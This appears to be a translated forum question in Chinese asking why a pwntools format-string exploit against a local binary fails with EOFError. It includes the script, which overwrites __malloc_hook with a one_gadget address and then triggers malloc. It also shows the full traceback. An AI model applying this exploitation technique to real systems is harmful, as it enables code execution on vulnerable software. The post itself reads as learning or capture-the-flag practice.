我试图通过覆盖 malloc_hook 来利用 pwntools 的格式错误字符串,所以我制作了以下脚本:
context.arch = "amd64"
elf = ELF("./format")
libc = elf.libc
p = process("./format")
def send_recv(payload):
p.sendline(payload)
val = p.recvline()
return val
def main():
#some address calculations such as libc leaks
one_gadget = libc.address + 0xe6c84
fmt = FmtStr(execute_fmt=send_recv)
fmt.write(libc.symbols['__malloc_hook'], one_gadget)
fmt.execute_writes()
p.sendline("%65580c")
当我运行脚本时,我收到以下错误:
File "script.py", line 47, in <module>
main()
File "script.py", line 40, in main
fmt.execute_writes()
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/fmtstr.py", line 906, in execute_writes
self.execute_fmt(fmtstr)
File "script.py", line 11, in send_recv
val = p.recvline()
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 490, in recvline
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 333, in recvuntil
res = self.recv(timeout=self.timeout)
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 105, in recv
return self._recv(numb, timeout) or b''
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 183, in _recv
if not self.buffer and not self._fillbuffer(timeout):
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 154, in _fillbuffer
data = self.recv_raw(self.buffer.get_fill_size())
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/process.py", line 717, in recv_raw
raise EOFError
EOFError
谁能帮帮我,好吗?提前致谢